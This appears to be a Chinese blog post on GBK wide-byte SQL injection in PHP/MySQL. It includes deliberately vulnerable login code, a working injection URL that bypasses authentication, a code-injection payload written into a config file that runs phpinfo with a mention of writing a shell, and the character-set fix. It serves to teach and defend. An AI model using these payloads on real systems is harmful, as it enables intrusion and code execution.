了解了很多的web后端验证的问题,特别是与数据库交汇的这部分我觉得有很大一部分吧,是需要长期的积累,
知识的学习本来是就是互相推翻之前学习的成果,然后建立新的思想,巩固自己的思维发展
字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。比如:
$conn = mysql_connect(”localhost”,”root”,”2sdfxedd”);
mysql_query(”SET NAMES ‘GBK’”);
mysql_select_db(”test”,$conn);
$user = mysql_escape_string($_GET['user']);
$pass = mysql_escape_string($_GET['pass']);
$sql = “select * from cms_user where username = ‘$user’ and password=’$pass’”;
$result = mysql_query($sql,$conn);
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $rows[] = $row; } ?>
则通过以下注入即可:
http://www.xxx.com/login.php?user=%df’%20or%201=1%20limit%201,1%23&pass=
对应的SQL是:
select * fromcms_user where username = ‘運’ or 1=1 limit 1,1#’ and password=”
解决方法:就是在初始化连接和字符集之后,使用SETcharacter_set_client=binary来设定客户端的字符集是二进制的。如:
mysql_query(”SET character_set_client=binary”);
################
以前对宽字节还是停留在GET上,得益于toby57牛的某篇文章,深入了一下
GPC打开了
提交:誠');phpinfo();//
转换:誠\');phpinfo();/
<?php
$config=array('誠\');phpinfo();//');
?>
php开始处理:D5 5C 5C 27... ,先处理转义,\ 没有了特殊作用,变成了 D5 \ ' ...,开始执行:誠'...,单引号引入,phpinfo执行。
运气好的话写shell?POST提交注入?
SET
character_set_connection=$dbcharset,character_set_results=$dbcharset, character_set_client=binary
接着上一步的